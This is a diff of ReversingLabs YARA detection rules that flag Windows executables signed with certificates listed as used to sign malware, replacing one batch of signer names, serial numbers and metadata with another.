INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d164846d-9552-5108-8b01-1b4b3e7c0b60" + id = "0169cf47-72b0-53ec-bc8f-c2a80febad3a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12388-L12404" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fa2a47f4fb822089fcc958850ce516c8c5d95a6d9b575f3b1d1d4a2ceb2537e4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6406-L6422" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "19f11e1d9ce95eb4bc75387a0118c230388a13cd07b02e00ea1d65cdcc0b2bd7" score = 75 quality = 90 tags = "INFO, FILE" @@ -17362,22 +37153,22 @@ rule REVERSINGLABS_Cert_Blocklist_6E889Bb3B7F7194B674C6A0335A608E0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CLEVERCONTROL LLC" and pe.signatures[i].serial=="6e:88:9b:b3:b7:f7:19:4b:67:4c:6a:03:35:a6:08:e0" and 1646956800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Smart Line Logistics" and pe.signatures[i].serial=="06:3a:7d:09:10:7e:dd:d8:aa:1f:73:36:34:c6:59:1b" and 1605712706<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0F62F760704Bdf8Dc30C7Baa7376F484 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1E74Cfe7De8C5F57840A61034414Ca9F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "fe326fb9-fe1e-5fc9-8599-6b4cfd6506dd" + id = "d7fd0c3f-0292-5d27-b8e6-559b829440b4" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12406-L12422" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d54d52e116b9404782ce80664f218d2e142577dac672c53c41b82f0466c7375a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6424-L6442" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d82220d908283f1707ec15882503b02cb8dc80095279a9e7d6cbdd113c25d8ae" score = 75 quality = 90 tags = "INFO, FILE" @@ -17387,22 +37178,22 @@ rule REVERSINGLABS_Cert_Blocklist_0F62F760704Bdf8Dc30C7Baa7376F484 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Shanghai XuSong investment partnership Enterprise(Limited)" and pe.signatures[i].serial=="0f:62:f7:60:70:4b:df:8d:c3:0c:7b:aa:73:76:f4:84" and 1659398400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Insta Software Solution Inc." and (pe.signatures[i].serial=="00:1e:74:cf:e7:de:8c:5f:57:84:0a:61:03:44:14:ca:9f" or pe.signatures[i].serial=="1e:74:cf:e7:de:8c:5f:57:84:0a:61:03:44:14:ca:9f") and 1601733106<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_071202Dbfda40B629C5E7Acac947C2D3 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_75Cf729F8A740Bbdef183A1C4D86A02F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4206c383-0e6d-5129-8e6a-05bd54c48e65" + id = "e96fdf57-3884-526e-a704-93e783c95241" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12424-L12440" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cc51b0ae6a59f68e61ee0b4ff33ea0e1ee9ef04e4c994e1c98da6befab62a5b9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6444-L6460" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "691fadaa653ecd29e60f2db39b7c5154d7c85f388f72eccd0a4b5fe42eaee0dd" score = 75 quality = 90 tags = "INFO, FILE" @@ -17412,22 +37203,22 @@ rule REVERSINGLABS_Cert_Blocklist_071202Dbfda40B629C5E7Acac947C2D3 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Crossfire Industries, LLC" and pe.signatures[i].serial=="07:12:02:db:fd:a4:0b:62:9c:5e:7a:ca:c9:47:c2:d3" and 1658620801<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Umbor LLC" and pe.signatures[i].serial=="75:cf:72:9f:8a:74:0b:bd:ef:18:3a:1c:4d:86:a0:2f" and 1604223894<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_98Ab9585C04D7F0E4Cf4De98C14B684D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2F64677254D3844Efdac2922123D05D1 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "445bb30e-e021-5a75-a47e-29fa567acfa5" + id = "de9ef02d-a723-5013-9f91-e394edc23855" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12442-L12460" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ba43dd15b13623bb99d88c93fb9e751deb95a546325a1142d9137b25430d07fd" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6462-L6478" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f9f1f629e03563ece0fe5186b199e2f030dce7f58fb259de1aeb7387c76fa902" score = 75 quality = 90 tags = "INFO, FILE" @@ -17437,22 +37228,22 @@ rule REVERSINGLABS_Cert_Blocklist_98Ab9585C04D7F0E4Cf4De98C14B684D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AMCERT,LLC" and (pe.signatures[i].serial=="00:98:ab:95:85:c0:4d:7f:0e:4c:f4:de:98:c1:4b:68:4d" or pe.signatures[i].serial=="98:ab:95:85:c0:4d:7f:0e:4c:f4:de:98:c1:4b:68:4d") and 1656547200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ORGANICUP ApS" and pe.signatures[i].serial=="2f:64:67:72:54:d3:84:4e:fd:ac:29:22:12:3d:05:d1" and 1605640092<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4631713E66E91347F0388B98Cf747794 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_32Fbf8Cfa43Dca3F85Efabe96Dfefa49 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6c541522-98ab-5acb-af84-c005c9721e1f" + id = "22bd8590-7a95-564c-ad77-fb20569de51d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12462-L12478" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cb517cda67150b7e17ee3bd946903e8e8eca81742a362032249a2f2387e71c50" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6480-L6496" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "73d80e6a0dc2316524a55a9627792b9b4488d238ef529f1767de182956b0865e" score = 75 quality = 90 tags = "INFO, FILE" @@ -17462,22 +37253,22 @@ rule REVERSINGLABS_Cert_Blocklist_4631713E66E91347F0388B98Cf747794 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE5\\xB9\\xBF\\xE5\\xB7\\x9E\\xE6\\x98\\x8A\\xE5\\x8A\\xA8\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="46:31:71:3e:66:e9:13:47:f0:38:8b:98:cf:74:77:94" and 1488240000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Foxstyle LLC" and pe.signatures[i].serial=="32:fb:f8:cf:a4:3d:ca:3f:85:ef:ab:e9:6d:fe:fa:49" and 1598255906<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_E963F8983D21B4C1A69C66A9D37498E5 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Ef9D0Cf071D463Cd63D13083046A7B8D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4cbc6cc9-1795-5d43-84a1-dd835d7ef349" + id = "8751f71b-0ebb-5820-927c-684a5ae5ee7b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12480-L12498" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b7c715e28f003351d10ba53657e9e667b635a0e4433276d91d26f4482a61191d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6498-L6516" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2923979811504f78a79a2480600285a2697845e51870a44ed231a81e79807121" score = 75 quality = 90 tags = "INFO, FILE" @@ -17487,22 +37278,22 @@ rule REVERSINGLABS_Cert_Blocklist_E963F8983D21B4C1A69C66A9D37498E5 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Max Steinhard" and (pe.signatures[i].serial=="00:e9:63:f8:98:3d:21:b4:c1:a6:9c:66:a9:d3:74:98:e5" or pe.signatures[i].serial=="e9:63:f8:98:3d:21:b4:c1:a6:9c:66:a9:d3:74:98:e5") and 1656288000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Rubin LLC" and (pe.signatures[i].serial=="00:ef:9d:0c:f0:71:d4:63:cd:63:d1:30:83:04:6a:7b:8d" or pe.signatures[i].serial=="ef:9d:0c:f0:71:d4:63:cd:63:d1:30:83:04:6a:7b:8d") and 1605358307<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6E44Fcedd49F22F7A28Cecc99104F61A : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_115Cf1353A0E33E19099A4867A4C750A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b69a4e06-a732-5462-b2b1-bdde3fd34e31" + id = "c2564461-6731-5d7b-8dbb-560929b568d0" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12500-L12516" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "caff0cbca45c0dffb673367585824783371f2f4e31a0c9629afb7de708098892" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6518-L6536" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2a3353c655531b113dc019a86288310881e3bbcb6c03670a805f22b185e09e6c" score = 75 quality = 90 tags = "INFO, FILE" @@ -17512,22 +37303,22 @@ rule REVERSINGLABS_Cert_Blocklist_6E44Fcedd49F22F7A28Cecc99104F61A : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "M-Trans Maciej Caban" and pe.signatures[i].serial=="6e:44:fc:ed:d4:9f:22:f7:a2:8c:ec:c9:91:04:f6:1a" and 1672923378<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "212 NY Gifts, Inc." and (pe.signatures[i].serial=="00:11:5c:f1:35:3a:0e:33:e1:90:99:a4:86:7a:4c:75:0a" or pe.signatures[i].serial=="11:5c:f1:35:3a:0e:33:e1:90:99:a4:86:7a:4c:75:0a") and 1605515909<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_35B49Ee870Aea532E6Ef0A4987105C8F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5Cf3778Bb11115A884E192A7Cb807599 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "88dedb69-52f4-59d3-b397-6a091a866cc5" + id = "cd643ad5-254a-5c53-a6f2-b263ff539cd3" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12518-L12534" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a9d8e9db453f40e32a0cb6412db8885db54053fdf3d7908b884361a493f97b1f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6538-L6556" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4242ef4a30bb09463ec5a6df9367915788a2aa782df6c463bcf966d2aad63c1d" score = 75 quality = 90 tags = "INFO, FILE" @@ -17537,22 +37328,22 @@ rule REVERSINGLABS_Cert_Blocklist_35B49Ee870Aea532E6Ef0A4987105C8F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Kancelaria Adwokacka Adwokat Aleksandra Krzemi\\xC5\\x84ska" and pe.signatures[i].serial=="35:b4:9e:e8:70:ae:a5:32:e6:ef:0a:49:87:10:5c:8f" and 1663151018<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SLOMATIC d.o.o." and (pe.signatures[i].serial=="00:5c:f3:77:8b:b1:11:15:a8:84:e1:92:a7:cb:80:75:99" or pe.signatures[i].serial=="5c:f3:77:8b:b1:11:15:a8:84:e1:92:a7:cb:80:75:99") and 1605006199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_063Dcd7D7B0Bc77Cac844C7213Be3989 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_82Cb93593B658100Cdd7A00C874287F2 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1bf4b84b-4a32-5908-8ccb-9fce2e5944e6" + id = "85df653a-a4a3-5d0e-86f4-cad0249cd3d3" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12536-L12552" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "091d00b0731f0a3d9917eee945249f001e4b5b1b603cad2fc21eed70ec86aa99" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6558-L6576" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c77881e0365c9fc398097d0b6e077330a5f0fcbb53279bfde96b3c01df914c55" score = 75 quality = 90 tags = "INFO, FILE" @@ -17562,22 +37353,22 @@ rule REVERSINGLABS_Cert_Blocklist_063Dcd7D7B0Bc77Cac844C7213Be3989 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HANNAH SISK LIMITED" and pe.signatures[i].serial=="06:3d:cd:7d:7b:0b:c7:7c:ac:84:4c:72:13:be:39:89" and 1656892801<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Sportsonline24 B.V." and (pe.signatures[i].serial=="00:82:cb:93:59:3b:65:81:00:cd:d7:a0:0c:87:42:87:f2" or pe.signatures[i].serial=="82:cb:93:59:3b:65:81:00:cd:d7:a0:0c:87:42:87:f2") and 1605117874<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6F8777Aa866142Ad7120E5E1C9321E37 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_9A8Bcfd05F86B15D0C99F50Cf414Bd00 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ace8a8b4-5288-56c4-bd47-9eb42ea41ecb" + id = "4446aead-9505-545a-8d3a-6ad844d348d3" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12554-L12570" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ca3ff0c7192ba90932d35d053712816555dea051ce15d29a7ccf4e37da989899" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6578-L6596" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "803d70dddeff51b753b577ea196b12570847c6875ae676a2d12cf1ca9323be34" score = 75 quality = 90 tags = "INFO, FILE" @@ -17587,22 +37378,22 @@ rule REVERSINGLABS_Cert_Blocklist_6F8777Aa866142Ad7120E5E1C9321E37 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CLOUD SOFTWARE LINE CO., LTD." and pe.signatures[i].serial=="6f:87:77:aa:86:61:42:ad:71:20:e5:e1:c9:32:1e:37" and 1629676800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AI Software a.s." and (pe.signatures[i].serial=="00:9a:8b:cf:d0:5f:86:b1:5d:0c:99:f5:0c:f4:14:bd:00" or pe.signatures[i].serial=="9a:8b:cf:d0:5f:86:b1:5d:0c:99:f5:0c:f4:14:bd:00") and 1592442000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4A7F07C5D4Ad2E23F9E8E03F0E229Dd4 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_95E5793F2Abe0B4Ec9Be54Fd24F76Ae5 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "76be58d9-d1a3-5dec-807e-941714be80f9" + id = "6b992971-6a1f-53e3-8651-f25a6b761c41" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12572-L12588" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6dc2bfac77117e294cacc772f7bfaea8b2e3caa26a0afd3729d517e91ca20ea5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6598-L6616" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bd198665ae952e11c91adc329908e3cd55a55365875200cd81d2f71fd092f1fe" score = 75 quality = 90 tags = "INFO, FILE" @@ -17612,22 +37403,22 @@ rule REVERSINGLABS_Cert_Blocklist_4A7F07C5D4Ad2E23F9E8E03F0E229Dd4 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Danalis LLC" and pe.signatures[i].serial=="4a:7f:07:c5:d4:ad:2e:23:f9:e8:e0:3f:0e:22:9d:d4" and 1608681600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Kommservice LLC" and (pe.signatures[i].serial=="00:95:e5:79:3f:2a:be:0b:4e:c9:be:54:fd:24:f7:6a:e5" or pe.signatures[i].serial=="95:e5:79:3f:2a:be:0b:4e:c9:be:54:fd:24:f7:6a:e5") and 1604933746<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_F5F9C8F8C33E4Ce84Dd48Fcb03Ccb075 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_133565779808C3B79D8E3F70A9C3Ffac : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "74203aa1-e5d0-59d9-b9f8-b79f5fbe271e" + id = "bc3f54a6-723d-5de5-9a59-2be8a005cedc" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12590-L12608" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ac3bab3f5a93099f39b0862b419346d1eb3d0f75d86e121ba30626d496c46c57" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6618-L6634" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b9fb2e3cc150b0278e67c673f7c01174c30b2cc4458c9c5e573661071795b793" score = 75 quality = 90 tags = "INFO, FILE" @@ -17637,22 +37428,22 @@ rule REVERSINGLABS_Cert_Blocklist_F5F9C8F8C33E4Ce84Dd48Fcb03Ccb075 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Abdulkadir \\xC5\\x9Eahin" and (pe.signatures[i].serial=="00:f5:f9:c8:f8:c3:3e:4c:e8:4d:d4:8f:cb:03:cc:b0:75" or pe.signatures[i].serial=="f5:f9:c8:f8:c3:3e:4c:e8:4d:d4:8f:cb:03:cc:b0:75") and 1545004800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Istok" and pe.signatures[i].serial=="13:35:65:77:98:08:c3:b7:9d:8e:3f:70:a9:c3:ff:ac" and 1605019819<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_57Fc55239F21F139978609E323097132 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7E0Ccda0Ef37Acef6C2Ebe4538627E5C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e71d575c-5a30-5158-80ee-3508cdaf5636" + id = "4668ceb3-8bf2-5be4-9a1a-d0d902c35cf0" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12610-L12626" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "030bb847e524e672ee382e0284ba3f027920f60c70bbd153d4b9cdd2669e6a99" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6636-L6654" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f13f9b70a2a3187522e4fff45a8a425863ad6242f82592aa9319c8d5fddeeefa" score = 75 quality = 90 tags = "INFO, FILE" @@ -17662,22 +37453,22 @@ rule REVERSINGLABS_Cert_Blocklist_57Fc55239F21F139978609E323097132 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Aidem Media Limited" and pe.signatures[i].serial=="57:fc:55:23:9f:21:f1:39:97:86:09:e3:23:09:71:32" and 1501632000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Orangetree B.V." and (pe.signatures[i].serial=="00:7e:0c:cd:a0:ef:37:ac:ef:6c:2e:be:45:38:62:7e:5c" or pe.signatures[i].serial=="7e:0c:cd:a0:ef:37:ac:ef:6c:2e:be:45:38:62:7e:5c") and 1606159604<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Eeefec4308Abe63323600E1608F5E6F2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Bad35Fd70025D46C56B89E32B1A3954C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "265f70f4-f8cf-52cf-8d9b-ddfefb8a1b79" + id = "871e399f-8498-5d66-ab5e-24e48491124f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12628-L12646" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "71ab4bd7e85155bfbc1612941c5f15c409629b116258c38b79bd808512df006a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6656-L6674" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1020250fc5030e50bc1e7d0f0c5a77e462a53f47bfcc4383c682b34fed567492" score 